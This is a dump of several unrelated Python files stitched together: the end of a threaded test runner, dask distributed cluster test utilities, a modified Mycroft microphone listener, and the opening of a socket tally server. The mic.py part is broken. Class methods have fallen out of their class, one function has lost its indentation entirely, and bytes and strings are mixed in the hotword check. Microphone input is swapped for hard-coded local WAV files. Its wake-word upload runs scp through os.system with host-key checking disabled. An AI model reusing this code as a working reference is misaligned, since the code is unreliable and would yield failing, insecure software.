        threadlist.append(threading.Thread(target=run_tests))
    # Run all threads
    for i, thread in enumerate(threadlist):
        thread.start()

    t_mk_input.join()
    # Producer finished: lets run_tests() workers exit once the queue drains.
    still_making_input = False

    # Wait for threads to complete
    for i, thread in enumerate(threadlist):
        thread.join()

    print(" ")
    print(" ")
    print("%d/%d tests succeeded." % (NTESTS - len(failures), NTESTS))
    print(" ")

    # Persist failing vectors as re-runnable command lines for debugging.
    if len(failures) > 0:
        error_log = open("error_log.txt", "a")
        for fail_key, fail_msg, fail_output in failures:
            error_log.write("%s %s %s %s %s" % (BIN_PATH, fail_key, fail_msg, fail_output, os.linesep))
        error_log.close()
|
test_utils_test.py | import asyncio
import pathlib
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
from tornado import gen
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.core import rpc
from distributed.metrics import time
from distributed.utils import get_ip
from distributed.utils_test import (
cluster,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
wait_for_port,
)
def test_bare_cluster(loop):
    """Smoke test: a ten-worker cluster starts and tears down cleanly."""
    with cluster(nworkers=10) as (scheduler_info, _workers):
        pass
def test_cluster(loop):
    """The default cluster exposes a Scheduler with two workers over rpc."""
    with cluster() as (info, [a, b]):
        with rpc(info["address"]) as sched:
            ident = loop.run_sync(sched.identity)
            assert ident["type"] == "Scheduler"
            assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
    """gen_cluster injects a client, a scheduler and two working workers."""
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    workers = (a, b)
    assert all(isinstance(w, Worker) for w in workers)
    assert s.nthreads == {w.address: w.nthreads for w in workers}
    assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
    """pytest fixtures (tmp_path) combine with gen_cluster-injected args."""
    assert isinstance(tmp_path, pathlib.Path)
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    assert all(isinstance(w, Worker) for w in (a, b))
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
    """A parametrize mark layers on top of gen_cluster's injected args."""
    assert foo is True
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    assert all(isinstance(w, Worker) for w in (a, b))
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
    """Multiple stacked parametrize marks also work with gen_cluster."""
    assert foo is True
    assert bar in ("a", "b")
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    assert all(isinstance(w, Worker) for w in (a, b))
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized_variadic_workers(c, s, *workers, foo):
    """Variadic *workers coexist with parametrized keyword-only args."""
    assert foo is True
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    assert all(isinstance(w, Worker) for w in workers)
@gen_cluster(
    client=True,
    Worker=Nanny,
    config={"distributed.comm.timeouts.connect": "1s", "new.config.value": "foo"},
)
async def test_gen_cluster_set_config_nanny(c, s, a, b):
    """Config passed to gen_cluster must reach Nanny workers and scheduler."""
    def assert_config():
        # Runs remotely in each worker / the scheduler process.
        import dask

        assert dask.config.get("distributed.comm.timeouts.connect") == "1s"
        assert dask.config.get("new.config.value") == "foo"
        return dask.config

    await c.run(assert_config)
    await c.run_on_scheduler(assert_config)
@gen_cluster(client=True)
def test_gen_cluster_legacy_implicit(c, s, a, b):
    # Legacy form: a plain generator function (no async/await); gen_cluster
    # still drives it as a coroutine, with `yield` awaiting futures.
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)
    assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
    assert (yield c.submit(lambda: 123)) == 123
@gen_cluster(client=True)
@gen.coroutine
def test_gen_cluster_legacy_explicit(c, s, a, b):
    # Legacy form: explicitly wrapped in tornado's gen.coroutine; verifies
    # gen_cluster still supports pre-async/await coroutines.
    assert isinstance(c, Client)
    assert isinstance(s, Scheduler)
    for w in [a, b]:
        assert isinstance(w, Worker)
    assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
    assert (yield c.submit(lambda: 123)) == 123
@pytest.mark.skip(reason="This hangs on travis")
def test_gen_cluster_cleans_up_client(loop):
    # The implicit client that gen_cluster(client=True) registers in dask
    # config must be gone again once the decorated body has finished.
    import dask.context

    assert not dask.config.get("get", None)

    @gen_cluster(client=True)
    async def f(c, s, a, b):
        assert dask.config.get("get", None)
        await c.submit(inc, 1)

    f()

    assert not dask.config.get("get", None)
@gen_cluster()
async def test_gen_cluster_without_client(s, a, b):
    """Without client=True only scheduler and workers are injected; a
    client can still be created manually against the scheduler address."""
    assert isinstance(s, Scheduler)
    assert all(isinstance(w, Worker) for w in (a, b))
    assert s.nthreads == {w.address: w.nthreads for w in (a, b)}

    async with Client(s.address, asynchronous=True) as c:
        assert await c.submit(lambda x: x + 1, 1) == 2
@gen_cluster(
    client=True,
    scheduler="tls://127.0.0.1",
    nthreads=[("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)],
    security=tls_only_security(),
)
async def test_gen_cluster_tls(e, s, a, b):
    """Every endpoint of a TLS-only cluster advertises a tls:// address."""
    assert isinstance(e, Client)
    assert isinstance(s, Scheduler)
    assert s.address.startswith("tls://")
    for worker in (a, b):
        assert isinstance(worker, Worker)
        assert worker.address.startswith("tls://")
    assert s.nthreads == {w.address: w.nthreads for w in (a, b)}
@gen_test()
async def test_gen_test():
    # gen_test must run a native coroutine to completion on a fresh loop.
    await asyncio.sleep(0.01)
@gen_test()
def test_gen_test_legacy_implicit():
    # Legacy form: bare generator function, implicitly treated as coroutine.
    yield asyncio.sleep(0.01)
@gen_test()
@gen.coroutine
def test_gen_test_legacy_explicit():
    # Legacy form: explicitly decorated with tornado's gen.coroutine.
    yield asyncio.sleep(0.01)
@contextmanager
def _listen(delay=0):
    """Yield a bound (but not yet listening) socket.

    A daemon thread starts listening after *delay* seconds, accepts the
    first connection and closes everything.  Used by test_wait_for_port
    to exercise the port-polling timeout logic.
    """
    serv = socket.socket()
    serv.bind(("127.0.0.1", 0))
    e = threading.Event()

    def do_listen():
        e.set()        # tell the main thread we're about to (slowly) listen
        sleep(delay)   # simulate a server that is slow to start listening
        serv.listen(5)
        ret = serv.accept()
        if ret is not None:
            cli, _ = ret
            cli.close()
        serv.close()

    t = threading.Thread(target=do_listen)
    t.daemon = True
    t.start()
    try:
        e.wait()
        sleep(0.01)
        yield serv
    finally:
        t.join(5.0)
def test_wait_for_port():
    """wait_for_port times out on a dead port and returns once listening."""
    start = time()
    with pytest.raises(RuntimeError):
        wait_for_port((get_ip(), 9999), 0.5)
    assert time() - start >= 0.5

    with _listen(0) as sock_fast:
        start = time()
        wait_for_port(sock_fast.getsockname())
        assert time() - start <= 1.0

    with _listen(1) as sock_slow:
        start = time()
        wait_for_port(sock_slow.getsockname())
        assert time() - start <= 2.0
def test_new_config():
    """new_config() applies overrides inside the block and restores after."""
    original = config.copy()
    with new_config({"xyzzy": 5}):
        # BUG FIX: this previously read `config["xyzzy"] == 5` — a bare
        # comparison whose result was discarded, so the override was
        # never actually verified.
        assert config["xyzzy"] == 5

    assert config == original
    assert "xyzzy" not in config
def test_lingering_client():
    # Deliberately leaks an unclosed async Client inside the cluster; after
    # teardown, no default client may remain registered.
    @gen_cluster()
    async def f(s, a, b):
        await Client(s.address, asynchronous=True)

    f()

    with pytest.raises(ValueError):
        default_client()
def test_lingering_client_2(loop):
    # A client created and never closed inside the cluster context must not
    # break cluster teardown.
    with cluster() as (s, [a, b]):
        client = Client(s["address"], loop=loop)
def test_tls_cluster(tls_client):
    """A TLS-secured client can round-trip a simple task."""
    # BUG FIX: the comparison's result was previously discarded (no assert),
    # so a wrong task result would not have failed the test.
    assert tls_client.submit(lambda x: x + 1, 10).result() == 11
    assert tls_client.security
@pytest.mark.asyncio
async def test_tls_scheduler(security, cleanup):
    # A scheduler started with a TLS security config must advertise a
    # tls:// address.
    async with Scheduler(
        security=security, host="localhost", dashboard_address=":0"
    ) as s:
        assert s.address.startswith("tls")
|
mic.py | # Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import audioop
import collections
import datetime
import shutil
from tempfile import gettempdir
from threading import Thread, Lock
from time import sleep, time as get_time
import os
import pyaudio
import unicodedata
import speech_recognition
from os import mkdir
from os.path import isdir, join, expanduser, isfile
from speech_recognition import (
Microphone,
AudioSource,
AudioData
)
from mycroft.configuration import ConfigurationManager
from mycroft.session import SessionManager
from mycroft.util import (
check_for_signal,
get_ipc_directory,
resolve_resource_file,
play_wav
)
import speech_recognition as sr
from mycroft.util.log import LOG
import time
class MutableStream(object):
    """Wrap a pyaudio input stream so it can be muted/unmuted on the fly."""

    def __init__(self, wrapped_stream, format, muted=False):
        assert wrapped_stream is not None
        self.wrapped_stream = wrapped_stream
        self.muted = muted
        self.SAMPLE_WIDTH = pyaudio.get_sample_size(format)
        # One silent sample, handed back in place of audio while muted.
        self.muted_buffer = b'\x00' * self.SAMPLE_WIDTH

    def mute(self):
        self.muted = True

    def unmute(self):
        self.muted = False

    def read(self, size):
        """Read *size* bytes from the wrapped stream (silence when muted)."""
        chunks = []
        bytes_left = size
        while bytes_left > 0:
            available = self.wrapped_stream.get_read_available()
            to_read = min(available, bytes_left)
            if to_read == 0:
                sleep(.01)  # nothing buffered yet; avoid a hot spin
                continue
            chunks.append(self.wrapped_stream.read(to_read))
            bytes_left -= to_read

        # While muted the device is still drained (above) but the captured
        # audio is discarded in favour of a silent buffer.
        if self.muted:
            return self.muted_buffer

        latency = self.wrapped_stream.get_input_latency()
        if latency > 0.2:
            LOG.warning("High input latency: %f" % latency)
        return b"".join(chunks)

    def close(self):
        self.wrapped_stream.close()
        self.wrapped_stream = None

    def is_stopped(self):
        return self.wrapped_stream.is_stopped()

    def stop_stream(self):
        return self.wrapped_stream.stop_stream()
class MutableMicrophone(Microphone):
    """Microphone whose stream supports runtime muting via MutableStream."""

    def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024,
                 mute=False):
        Microphone.__init__(
            self, device_index=device_index, sample_rate=sample_rate,
            chunk_size=chunk_size)
        self.muted = False
        if mute:
            self.mute()

    def __enter__(self):
        """Open the pyaudio device and wrap it in a MutableStream."""
        assert self.stream is None, \
            "This audio source is already inside a context manager"
        self.audio = pyaudio.PyAudio()
        raw_stream = self.audio.open(
            input_device_index=self.device_index, channels=1,
            format=self.format, rate=self.SAMPLE_RATE,
            frames_per_buffer=self.CHUNK,
            input=True,  # stream is an input stream
        )
        self.stream = MutableStream(raw_stream, self.format, self.muted)
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        if not self.stream.is_stopped():
            self.stream.stop_stream()
        self.stream.close()
        self.stream = None
        self.audio.terminate()

    def mute(self):
        # Remember the state so a stream opened later starts muted too.
        self.muted = True
        if self.stream:
            self.stream.mute()

    def unmute(self):
        self.muted = False
        if self.stream:
            self.stream.unmute()

    def is_muted(self):
        return self.muted
class ResponsiveRecognizer(speech_recognition.Recognizer):
    """Recognizer that waits for a wake/hot word, then records one phrase."""

    # Padding of silence when feeding to pocketsphinx
    SILENCE_SEC = 0.01

    # NOTE(review): only referenced from commented-out code in listen();
    # appears to be leftover experiment state — confirm before removing.
    COUNT_TURNS = 0

    # The minimum seconds of noise before a
    # phrase can be considered complete
    MIN_LOUD_SEC_PER_PHRASE = 0.5

    # The minimum seconds of silence required at the end
    # before a phrase will be considered complete
    MIN_SILENCE_AT_END = 0.25

    # The maximum seconds a phrase can be recorded,
    # provided there is noise the entire time
    RECORDING_TIMEOUT = 10.0

    # The maximum time it will continue to record silence
    # when not enough noise has been detected
    RECORDING_TIMEOUT_WITH_SILENCE = 3.0

    # Time between pocketsphinx checks for the wake word
    SEC_BETWEEN_WW_CHECKS = 0.2
def __init__(self, wake_word_recognizer, hot_word_engines=None):
    """Set up listener thresholds and wake-word save/upload state.

    Args:
        wake_word_recognizer: engine exposing `num_phonemes` (used below)
            and `key_phrase` (used by _wait_until_wake_word).
        hot_word_engines (dict): optional mapping of hotword ->
            (engine, ding, utterance, listen) tuples.
    """
    if hot_word_engines is None:
        hot_word_engines = {}
    self.config = ConfigurationManager.instance()
    listener_config = self.config.get('listener')
    # NOTE(review): assumes 'wake_word_upload' and 'wake_word' keys exist
    # in the listener config — confirm against the config schema.
    self.upload_config = listener_config.get('wake_word_upload')
    self.wake_word_name = listener_config['wake_word']
    # The maximum audio in seconds to keep for transcribing a phrase
    # The wake word must fit in this time
    num_phonemes = wake_word_recognizer.num_phonemes
    len_phoneme = listener_config.get('phoneme_duration', 120) / 1000.0
    self.TEST_WW_SEC = int(num_phonemes * len_phoneme)
    # Keep a longer (10 s) rolling buffer when uploads are enabled so the
    # whole wake-word utterance can be saved.
    self.SAVED_WW_SEC = (10 if self.upload_config['enable']
                         else self.TEST_WW_SEC)
    speech_recognition.Recognizer.__init__(self)
    self.wake_word_recognizer = wake_word_recognizer
    self.audio = pyaudio.PyAudio()
    self.multiplier = listener_config.get('multiplier')
    self.energy_ratio = listener_config.get('energy_ratio')
    # check the config for the flag to save wake words.
    self.save_utterances = listener_config.get('record_utterances', False)
    self.save_wake_words = listener_config.get('record_wake_words', False) \
        or self.upload_config['enable'] or self.config['opt_in']
    self.upload_lock = Lock()
    self.save_wake_words_dir = join(gettempdir(), 'mycroft_wake_words')
    self.filenames_to_upload = []
    self.mic_level_file = os.path.join(get_ipc_directory(), "mic_level")
    self._stop_signaled = False
    self.hot_word_engines = hot_word_engines
@staticmethod
def record_sound_chunk(source):
    # Read one CHUNK-sized buffer from the source's (mutable) stream.
    return source.stream.read(source.CHUNK)
@staticmethod
def calc_energy(sound_chunk, sample_width):
    # RMS amplitude of the chunk; used as the loudness/"energy" measure.
    return audioop.rms(sound_chunk, sample_width)
def _record_phrase(self, source, sec_per_buffer):
    """Record an entire spoken phrase.

    Essentially, this code waits for a period of silence and then returns
    the audio.  If silence isn't detected, it will terminate and return
    a buffer of RECORDING_TIMEOUT duration.

    Args:
        source (AudioSource): Source producing the audio chunks
        sec_per_buffer (float): Fractional number of seconds in each chunk

    Returns:
        bytes: complete audio buffer recorded, including any
               silence at the end of the user's utterance
    """
    num_loud_chunks = 0
    noise = 0
    max_noise = 25
    min_noise = 0
    silence_duration = 0

    def increase_noise(level):
        # Loud chunk: ramp the noise score up (capped at max_noise).
        if level < max_noise:
            return level + 200 * sec_per_buffer
        return level

    def decrease_noise(level):
        # Quiet chunk: decay the noise score (floored at min_noise).
        if level > min_noise:
            return level - 100 * sec_per_buffer
        return level

    # Smallest number of loud chunks required to return
    min_loud_chunks = int(self.MIN_LOUD_SEC_PER_PHRASE / sec_per_buffer)

    # Maximum number of chunks to record before timing out
    max_chunks = int(self.RECORDING_TIMEOUT / sec_per_buffer)
    num_chunks = 0

    # Will return if exceeded this even if there's not enough loud chunks
    max_chunks_of_silence = int(self.RECORDING_TIMEOUT_WITH_SILENCE /
                                sec_per_buffer)

    # Buffer to accumulate audio in.  BUG FIX: this was the *text* literal
    # '\0' * SAMPLE_WIDTH, which raises TypeError on Python 3 as soon as
    # the first bytes chunk is appended.
    byte_data = b'\0' * source.SAMPLE_WIDTH

    phrase_complete = False
    while num_chunks < max_chunks and not phrase_complete:
        chunk = self.record_sound_chunk(source)
        byte_data += chunk
        num_chunks += 1

        energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
        test_threshold = self.energy_threshold * self.multiplier
        is_loud = energy > test_threshold
        if is_loud:
            noise = increase_noise(noise)
            num_loud_chunks += 1
        else:
            noise = decrease_noise(noise)
            self._adjust_threshold(energy, sec_per_buffer)

        # Periodically dump the mic level for external visualization.
        if num_chunks % 10 == 0:
            with open(self.mic_level_file, 'w') as f:
                f.write("Energy: cur=" + str(energy) + " thresh=" +
                        str(self.energy_threshold))
            # (redundant f.close() removed — the with-block closes it)

        was_loud_enough = num_loud_chunks > min_loud_chunks
        quiet_enough = noise <= min_noise
        if quiet_enough:
            silence_duration += sec_per_buffer
            if silence_duration < self.MIN_SILENCE_AT_END:
                quiet_enough = False  # gotta be silent for min of 1/4 sec
        else:
            silence_duration = 0
        recorded_too_much_silence = num_chunks > max_chunks_of_silence
        if quiet_enough and (was_loud_enough or recorded_too_much_silence):
            phrase_complete = True

        # Pressing top-button will end recording immediately
        if check_for_signal('buttonPress'):
            phrase_complete = True

    return byte_data
@staticmethod
def sec_to_bytes(sec, source):
    # Convert seconds to a byte count for the source's rate/sample width.
    return sec * source.SAMPLE_RATE * source.SAMPLE_WIDTH
def _skip_wake_word(self):
    """Return True when listening should begin without a wake word."""
    # Check if told programatically to skip the wake word, like
    # when we are in a dialog with the user.
    if check_for_signal('startListening'):
        return True

    # Pressing the Mark 1 button can start recording (unless
    # it is being used to mean 'stop' instead)
    if check_for_signal('buttonPress', 1):
        # give other processes time to consume this signal if
        # it was meant to be a 'stop'
        sleep(0.25)
        if check_for_signal('buttonPress'):
            # Signal is still here, assume it was intended to
            # begin recording
            LOG.debug("Button Pressed, wakeword not needed")
            return True

    return False
def stop(self):
    """
    Signal stop and exit waiting state.

    Checked by _wait_until_wake_word() and listen() on each loop turn.
    """
    self._stop_signaled = True
def _upload_file(self, filename):
    """Queue *filename* and try to scp every pending recording.

    Files that fail to upload remain in self.filenames_to_upload and are
    retried on the next call.
    """
    server = self.upload_config['server']
    keyfile = resolve_resource_file('wakeword_rsa')
    userfile = expanduser('~/.mycroft/wakeword_rsa')

    # First run: install a private copy of the key with safe permissions.
    if not isfile(userfile):
        shutil.copy2(keyfile, userfile)
        os.chmod(userfile, 0o600)
    keyfile = userfile

    address = self.upload_config['user'] + '@' + \
        server + ':' + self.upload_config['folder']

    with self.upload_lock:
        self.filenames_to_upload.append(filename)
        # BUG FIX: the old code did `del list[i]` while enumerating the
        # same list, which skips the next entry and — after the first
        # removal — deletes the wrong elements.  Rebuild the pending
        # list instead.
        remaining = []
        for fn in self.filenames_to_upload:
            LOG.debug('Uploading ' + fn + '...')
            os.chmod(fn, 0o666)
            # NOTE(review): command built by string concatenation and run
            # via os.system; paths are internally generated, but subprocess
            # with an argv list would be safer against odd filenames.
            cmd = 'scp -o StrictHostKeyChecking=no -P ' + \
                str(self.upload_config['port']) + ' -i ' + \
                keyfile + ' ' + fn + ' ' + address
            if os.system(cmd) == 0:
                os.remove(fn)
            else:
                LOG.debug('Could not upload ' + fn + ' to ' + server)
                remaining.append(fn)
        self.filenames_to_upload = remaining
def read_wave_file(self, wave_file_path):
    """Load the entire WAV file at *wave_file_path* as AudioData."""
    recognizer = sr.Recognizer()
    with sr.AudioFile(wave_file_path) as wav_source:
        return recognizer.record(wav_source)
def _wait_until_wake_word(self, source, sec_per_buffer, emitter):
    """Listen continuously on source until a wake word is spoken

    Args:
        source (AudioSource): Source producing the audio chunks
        sec_per_buffer (float): Fractional number of seconds in each chunk

    NOTE(review): large spans of this method have been disabled by turning
    them into bare triple-quoted string literals (no-op expression
    statements).  As written, each loop turn transcribes a hard-coded WAV
    file instead of monitoring the microphone — presumably experiment
    instrumentation; confirm before shipping.
    """
    #print("source is-->",source)
    num_silent_bytes = int(self.SILENCE_SEC * source.SAMPLE_RATE *
                           source.SAMPLE_WIDTH)
    # Disabled (string literal): rolling-buffer setup for live capture.
    """
    silence = '\0' * num_silent_bytes

    # bytearray to store audio in
    byte_data = silence

    buffers_per_check = self.SEC_BETWEEN_WW_CHECKS / sec_per_buffer
    buffers_since_check = 0.0

    # Max bytes for byte_data before audio is removed from the front
    max_size = self.sec_to_bytes(self.SAVED_WW_SEC, source)
    test_size = self.sec_to_bytes(self.TEST_WW_SEC, source)
    """
    said_wake_word = False
    # Disabled (string literal): energy-averaging state.
    """
    # Rolling buffer to track the audio energy (loudness) heard on
    # the source recently. An average audio energy is maintained
    # based on these levels.
    energies = []
    idx_energy = 0
    avg_energy = 0.0
    energy_avg_samples = int(5 / sec_per_buffer)  # avg over last 5 secs
    counter = 0
    """
    while not said_wake_word and not self._stop_signaled:
        # Disabled (string literal): chunked mic capture, threshold
        # maintenance and rolling-buffer bookkeeping.
        """
        if self._skip_wake_word():
            break
        chunk = self.record_sound_chunk(source)
        # LOG.info("((((((check 1))))))))")
        energy = self.calc_energy(chunk, source.SAMPLE_WIDTH)
        if energy < self.energy_threshold * self.multiplier:
            self._adjust_threshold(energy, sec_per_buffer)

        if len(energies) < energy_avg_samples:
            # build the average
            energies.append(energy)
            avg_energy += float(energy) / energy_avg_samples
        else:
            # maintain the running average and rolling buffer
            avg_energy -= float(energies[idx_energy]) / energy_avg_samples
            avg_energy += float(energy) / energy_avg_samples
            energies[idx_energy] = energy
            idx_energy = (idx_energy + 1) % energy_avg_samples

            # maintain the threshold using average
            if energy < avg_energy * 1.5:
                if energy > self.energy_threshold:
                    # bump the threshold to just above this value
                    self.energy_threshold = energy * 1.2

        # Periodically output energy level stats. This can be used to
        # visualize the microphone input, e.g. a needle on a meter.
        if counter % 3:
            with open(self.mic_level_file, 'w') as f:
                f.write("Energy: cur=" + str(energy) + " thresh=" +
                        str(self.energy_threshold))
            f.close()
        counter += 1
        #LOG.info("((((((check 2))))))))")
        # At first, the buffer is empty and must fill up. After that
        # just drop the first chunk bytes to keep it the same size.
        needs_to_grow = len(byte_data) < max_size
        if needs_to_grow:
            byte_data += chunk
        else:  # Remove beginning of audio and add new chunk to end
            byte_data = byte_data[len(chunk):] + chunk

        buffers_since_check += 1.0
        if buffers_since_check > buffers_per_check:
            buffers_since_check -= buffers_per_check
            chopped = byte_data[-test_size:] \
                if test_size < len(byte_data) else byte_data
            #audio_data = chopped + silence
        """
        # Active path: transcribe a fixed WAV file with pocketsphinx and
        # run the result through the hotword matcher.
        r = sr.Recognizer()
        print("speech recognition object -->", r)
        audio_data = self.read_wave_file("/home/sg/wavFiles/software.wav")
        wakeWord = r.recognize_sphinx(audio_data)
        LOG.error("*********time before check for hotwords------>>>"+str(datetime.datetime.now()))
        said_wake_word = self.check_for_hotwords(wakeWord, emitter)
        LOG.error("*********time after check for hotwords------>>>"+str(datetime.datetime.now()))
        # Disabled (string literal): hotword event emission, confirmation
        # sound and wake-word persistence/upload.
        """
        if said_wake_word:
            payload = {
                'hotword': self.wake_word_recognizer.key_phrase,
                'start_listening': True,
                'sound': resolve_resource_file(
                    self.config.get('sounds').get('start_listening')),
                "engine": "pocketsphinx"
            }
            emitter.emit("recognizer_loop:hotword", payload)

            # If enabled, play a wave file with a short sound
            # to audibly indicate recording has begun.
            if self.config.get('confirm_listening'):
                file = resolve_resource_file(
                    self.config.get('sounds').get('start_listening'))
                if file:
                    play_wav(file)
            #sleep(10)
            # if a wake word is success full then record audio in temp
            # file.
            if self.save_wake_words:
                audio = self._create_audio_data(byte_data, source)

                if not isdir(self.save_wake_words_dir):
                    mkdir(self.save_wake_words_dir)
                dr = self.save_wake_words_dir

                ww_module = self.wake_word_recognizer.__class__.__name__
                ww = self.wake_word_name.replace(' ', '-')
                md = str(abs(hash(ww_module)))
                stamp = str(int(1000 * get_time()))
                sid = SessionManager.get().session_id
                uid = IdentityManager.get().uuid
                fn = join(dr, '.'.join([ww, md, stamp, sid, uid]) + '.wav')

                with open(fn, 'wb') as f:
                    f.write(audio.get_wav_data())

                if self.upload_config['enable'] or self.config['opt_in']:
                    t = Thread(target=self._upload_file, args=(fn,))
                    t.daemon = True
                    t.start()
        """
def check_for_hotwords(self, wakeWord, emitter):
    """Match the transcription *wakeWord* against configured hotwords.

    Emits recognizer_loop:hotword (and optionally an utterance) for a
    match; returns True when a matching hotword requests listening.
    """
    print("******Sentence passed is--->", wakeWord)
    # check hot word
    for hotword in self.hot_word_engines:
        print("*************hotword is****>", hotword)
        engine, ding, utterance, listen = self.hot_word_engines[hotword]
        #found = wakeWord == hotword
        LOG.error("typeof hotword::::"+str(type(hotword)))
        LOG.error("typeof wakeWord::::"+str(type(wakeWord)))
        # Strip accents so the substring check below compares ASCII.
        hotword = unicodedata.normalize('NFKD', hotword).encode('ascii','ignore')
        LOG.error("new hotword:::"+hotword+ " res "+str(wakeWord == hotword))
        if hotword.lower() in wakeWord.lower():
            LOG.error("Hot Word detected time: "+ str(datetime.datetime.now()))
            #self.finalHotWord = wakeWord
            # NOTE(review): writes the detected hotword to a file in the
            # process CWD — looks like debug instrumentation; confirm.
            fileName = "hotWordFile.txt"
            file = open(fileName,"w")
            file.write(hotword.lower())
            file.close()
            # If enabled, play a wave file with a short sound to audibly
            # indicate hotword was detected.
            # Disabled (string literal); note it contains Python 2
            # `print e` syntax and must stay disabled under Python 3.
            """
            if ding:
                try:
                    file = resolve_resource_file(ding)
                    if file:
                        play_wav(file)
                except Exception as e:
                    print e
            """
            # Hot Word succeeded
            payload = {
                'hotword': hotword,
                'start_listening': listen,
                'sound': ding,
                "engine": "pocketsphinx"
            }
            emitter.emit("recognizer_loop:hotword", payload)
            if utterance:
                # send the transcribed word on for processing
                payload = {
                    'utterances': [utterance]
                }
                emitter.emit("recognizer_loop:utterance", payload)
            if listen:
                # start listening
                return True
    return False
@staticmethod
def _create_audio_data(raw_data, source):
    """
    Constructs an AudioData instance with the same parameters
    as the source and the specified frame_data
    """
    # Sample rate and width are taken from the source so the resulting
    # AudioData matches the capture format exactly.
    return AudioData(raw_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen(self, source, emitter):
    """Listens for chunks of audio that Mycroft should perform STT on.
    This will listen continuously for a wake-up-word, then return the
    audio chunk containing the spoken phrase that comes immediately
    afterwards.
    Args:
        source (AudioSource): Source producing the audio chunks
        emitter (EventEmitter): Emitter for notifications of when recording
            begins and ends.
    Returns:
        AudioData: audio with the user's utterance, minus the wake-up-word
    """
    assert isinstance(source, AudioSource), "Source must be an AudioSource"
    # bytes_per_sec = source.SAMPLE_RATE * source.SAMPLE_WIDTH
    # Duration (seconds) represented by one audio chunk.
    sec_per_buffer = float(source.CHUNK) / source.SAMPLE_RATE
    # Every time a new 'listen()' request begins, reset the threshold
    # used for silence detection. This is as good of a reset point as
    # any, as we expect the user and Mycroft to not be talking.
    # NOTE: adjust_for_ambient_noise() doc claims it will stop early if
    # speech is detected, but there is no code to actually do that.
    self.adjust_for_ambient_noise(source, 1.0)
    #LOG.debug("Waiting for wake word...")
    #LOG.debug("****source is-->", source)
    time.sleep(1)
    # Blocks until the wake word is heard or a stop is signaled.
    self._wait_until_wake_word(source, sec_per_buffer, emitter)
    if self._stop_signaled:
        return
    LOG.debug("Recording...")
    emitter.emit("recognizer_loop:record_begin")
    # If enabled, play a wave file with a short sound to audibly
    # indicate recording has begun.
    if self.config.get('confirm_listening'):
        file = resolve_resource_file(
            self.config.get('sounds').get('start_listening'))
        if file:
            play_wav(file)
    frame_data = self._record_phrase(source, sec_per_buffer)
    #global COUNT_TURNS
    #LOG.info("*******COUNT_TURNS******"+COUNT_TURNS)
    #if(COUNT_TURNS % 2 == 0):
    #audio_data = self.read_wave_file("/home/sg/wavFiles/software.wav")
    #else:
    LOG.error("main stt after wake word")
    # NOTE(review): the microphone recording in `frame_data` is discarded
    # and a fixed wav file is returned instead — this looks like a
    # debugging override (see the commented-out _create_audio_data call
    # below). Confirm this hard-coded path is intentional.
    audio_data = self.read_wave_file("/home/sg/wavFiles/tellmemore.wav")
    #COUNT_TURNS +=1
    #audio_data = self._create_audio_data(frame_data, source)
    emitter.emit("recognizer_loop:record_end")
    if self.save_utterances:
        # Optionally keep a copy of what will be sent to STT.
        LOG.info("Recording utterance")
        stamp = str(datetime.datetime.now())
        filename = "/tmp/mycroft_utterance%s.wav" % stamp
        with open(filename, 'wb') as filea:
            filea.write(audio_data.get_wav_data())
    LOG.debug("Thinking...")
    return audio_data
def _adjust_threshold(self, energy, seconds_per_buffer):
if self.dynamic_energy_threshold and energy > 0:
# account for different chunk sizes and rates
damping = (
self.dynamic_energy_adjustment_damping ** seconds_per_buffer)
target_energy = energy * self.energy_ratio
self.energy_threshold = (
self.energy_threshold * damping +
target_energy * (1 - damping))
|
server.py | import struct
import socket
import sys
from threading import Thread
import random
import copy #TEMP
from time import sleep #TEMP
from Queue import Queue
import time
STATES = 16
class Server:
    """Base type for tally servers; defines the LUT-loading hook."""

    def loadResultLut(self, path):
        """Stub hook: subclasses override to load a result lookup table.

        Returns 0 to signal that nothing was loaded.
        """
        # Fix: the original signature `loadResultLut(path)` lacked `self`,
        # so calling it on an instance passed the instance as `path` and
        # any real argument raised TypeError.
        return 0
class RemoteServer(Server):
    """Client-side handle for one remote tally server.

    Holds the two outbound control sockets (index + vector), placeholders
    for the inbound connections accepted on this side, a seeded PRNG that
    stays in lock-step with the remote peer's, and an obfuscation LUT.
    """

    def __init__(self, ip=None, seed=None, riport=None, rvport=None,
                 iport=None, vport=None, label=None, scheduler_port=None):
        self.ip = ip
        self.riport = riport  # remote index port (outbound connect)
        self.rvport = rvport  # remote vector port (outbound connect)
        self.iport = iport    # local index port (inbound listen)
        self.vport = vport    # local vector port (inbound listen)
        self.isock = None
        self.iconn = None
        self.iaddr = None
        self.vsock = None
        self.vconn = None
        self.vaddr = None
        # Seeding with the shared seed keeps shuffles/randints on this
        # side reproducible against the remote peer's.
